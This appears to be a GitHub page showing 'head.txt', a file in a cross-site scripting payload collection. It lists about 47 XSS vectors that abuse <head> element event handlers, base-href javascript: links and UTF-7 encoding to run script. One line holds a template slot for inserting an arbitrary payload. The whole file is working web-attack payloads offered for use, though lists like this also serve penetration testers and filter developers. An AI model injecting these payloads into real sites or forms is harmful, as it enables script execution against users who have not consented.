-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhead.txt
48 lines (47 loc) · 2.56 KB
/
head.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<head draggable="true" ondrag="alert(1)">test</head>
<head draggable="true" ondragend="alert(1)">test</head>
<head draggable="true" ondragenter="alert(1)">test</head>
<head draggable="true" ondragleave="alert(1)">test</head>
<head draggable="true" ondragstart="alert(1)">test</head>
<head id=x tabindex=1 onactivate=alert(1)></head>
<head id=x tabindex=1 onbeforeactivate=alert(1)></head>
<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus>
<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>
<head id=x tabindex=1 onfocus=alert(1)></head>
<head id=x tabindex=1 onfocusin=alert(1)></head>
<head onafterscriptexecute=alert(1)><script>1</script>
<head onbeforecopy="alert(1)" contenteditable>test</head>
<head onbeforecut="alert(1)" contenteditable>test</head>
<head onbeforepaste="alert(1)" contenteditable>test</head>
<head onbeforescriptexecute=alert(1)><script>1</script>
<head onblur=alert(1) tabindex=1 id=x></head><input autofocus>
<head onclick="alert(1)">test</head>
<head oncontextmenu="alert(1)">test</head>
<head oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<head oncut=alert(1) value="XSS" autofocus tabindex=1>test
<head ondblclick="alert(1)" autofocus tabindex=1>test</head>
<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus>
<head onkeydown="alert(1)" contenteditable>test</head>
<head onkeypress="alert(1)" contenteditable>test</head>
<head onkeyup="alert(1)" contenteditable>test</head>
<head onmousedown="alert(1)">test</head>
<head onmouseenter="alert(1)">test</head>
<head onmouseleave="alert(1)">test</head>
<head onmousemove="alert(1)">test</head>
<head onmouseout="alert(1)">test</head>
<head onmouseover="alert(1)">test</head>
<head onmouseup="alert(1)">test</head>
<head onmousewheel=alert(1)>requires scrolling
<head onpaste="alert(1)" contenteditable>test</head>
<head onpointerdown=alert(1)>XSS</head>
<head onpointerenter=alert(1)>XSS</head>
<head onpointerleave=alert(1)>XSS</head>
<head onpointermove=alert(1)>XSS</head>
<head onpointerout=alert(1)>XSS</head>
<head onpointerover=alert(1)>XSS</head>
<head onpointerrawupdate=alert(1)>XSS</head>
<head onpointerup=alert(1)>XSS</head>
<head><base href="javascript://"></head><body><a href="/. /,alert(1)//#">XSS</a></body>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-